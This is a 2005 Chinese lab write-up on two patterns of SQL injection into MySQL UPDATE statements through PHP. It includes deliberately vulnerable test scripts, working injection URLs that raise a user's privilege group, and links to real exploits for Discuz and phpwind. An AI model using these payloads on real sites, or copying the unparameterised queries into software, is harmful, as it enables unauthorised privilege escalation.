UPDATE注射(mysql+php)的兩個模式_漏洞研究

UPDATE注射(mysql+php)的兩個模式 
                             文/安全天使·SuperHei 2005.8.11 
一.測試環境： 
OS: Windowsxp sp2 
php: php 4.3.10 ( 
mysql 4.1.9 
apache 1.3.33  

二.測試資料庫結構： 
-----start--- 
-- 資料庫: `test` 
--  

-- -------------------------------------------------------- 

--  
-- 表的結構 `userinfo` 
--  

CREATE TABLE `userinfo` ( 
  `groudid` varchar(12) NOT NULL default '1', 
  `user` varchar(12) NOT NULL default 'heige', 
  `pass` varchar(122) NOT NULL default '123456' 
) ENGINE=MyISAM DEFAULT CHARSET=latin1; 

--  
-- 匯出表中的資料 `userinfo` 
--  

INSERT INTO `userinfo` VALUES ('2', 'heige', '123456'); 
------end------- 

三.測試模式： 
1,變數沒有帶''或""[MOD1] 

<?php 
//test1.php Mod1 
$servername = "localhost"; 
$dbusername = "root"; 
$dbpassword = ""; 
$dbname = "test"; 

mysql_connect($servername,$dbusername,$dbpassword) or die ("資料庫連接失敗"); 

$sql = "update userinfo set pass=$p where user='heige'";//<--$P沒有使用單引號 

$result = mysql_db_query($dbname, $sql); 
$userinfo = mysql_fetch_array($result); 

echo "<p>SQL Query:$sql<p>"; 
?> 

指令碼裡只是修改user='heige'的pass，如果groudid表示使用者的許可權等級，我們的目的就是通過構造$p 來達 
到修改groupid的目的： 

那麼我們提交：http://127.0.0.1/test1.php?p=123456,groudid=1 

在mysql裡查詢： 
mysql> select * from userinfo; 
+---------+-------+--------+ 
| groudid | user  | pass   | 
+---------+-------+--------+ 
| 1       | heige | 123456 | 
+---------+-------+--------+ 
1 row in set (0.01 sec) 

使用者heige的groudid又2改為1了 :) 

所以我們可以得到沒有''或"" update的注射是可以成功的，這個就是我們的模式1。 

2,變數帶''或""[MOD2] 

<?php 
//test2.php 
$servername = "localhost"; 
$dbusername = "root"; 
$dbpassword = ""; 
$dbname = "test"; 

mysql_connect($servername,$dbusername,$dbpassword) or die ("資料庫連接失敗"); 

$sql = "update userinfo set pass='$p' where user='heige'";//<--$P使用單引號 

$result = mysql_db_query($dbname, $sql); 
$userinfo = mysql_fetch_array($result); 

echo "<p>SQL Query:$sql<p>"; 
?> 

為了關閉'我們構造$p應該為123456',groudid='2 提交： 
http://127.0.0.1/test2.php?p=123456',groudid='1 在gpc=on的情況下'變成了\' 
提交的語句變成：SQL Query:update userinfo set pass='123456\',groudid=\'1' where user='heige' 

mysql查詢： 
mysql> select * from userinfo; 
+---------+-------+--------------------+ 
| groudid | user  | pass               | 
+---------+-------+--------------------+ 
| 2       | heige | 123456',groudid='1 | 
+---------+-------+--------------------+ 
1 row in set (0.00 sec) 

groudid並沒有被修改。那麼在變數被''或""時 就完全沒有被注射呢？不是 下面我們看模式2： 

<?php 
//test3.php Mod2 
$servername = "localhost"; 
$dbusername = "root"; 
$dbpassword = ""; 
$dbname = "test"; 

mysql_connect($servername,$dbusername,$dbpassword) or die ("資料庫連接失敗"); 

$sql = "update userinfo set pass='$p' where user='heige'";//<--$P使用單引號 

$result = mysql_db_query($dbname, $sql); 
mysql_fetch_array($result);    //$p的資料寫入資料庫 

$sql= "select pass from userinfo where user='heige'";  
$result = mysql_db_query($dbname, $sql); 
$userinfo=mysql_fetch_array($result);  

echo $userinfo[0];  //把pass查詢輸出給$userinfo[0] 

$sql ="update userinfo set pass='$userinfo[0]' where user='heige'"; 
$result = mysql_db_query($dbname, $sql); 
mysql_fetch_array($result); //把$userinfo[0] 再次update 

?> 

我們測試下，提交：http://127.0.0.1/test3.php?p=123456',groudid='1 
回mysql查詢下 ： 
mysql> select * from userinfo; 
+---------+-------+--------+ 
| groudid | user  | pass   | 
+---------+-------+--------+ 
| 1       | heige | 123456 | 
+---------+-------+--------+ 
1 row in set (0.00 sec) 

HaHa~~ 成功注射 修改groudid為1。 這個就是我們的模式2了，簡單的描敘如下： 

update-->select-->update 

四.實際模式 
模式1：Discuz 2.0/2.2 register.php 注射  
       漏洞分析：http://4ngel.net/article/41.htm 
       Discuz 2.0/2.2 register.php Remote Exploit ：http://4ngel.net/project/discuz_reg.htm 
模式2：phpwind 2.0.2和3.31e 許可權提升漏洞  
       漏洞分析： 
           update (profile.php 注射變數為$proicon update語句裡為,icon='$userdb[icon]'） 

              v 
           select (jop.php) 

              v 
           updtate (jop.php) 

       Exploit:http://www.huij.net/9xiao/up/phpwind-exploit.exe  

五.鳴謝 
   特別感謝saiy等朋友的討論和協助。Thanks!!!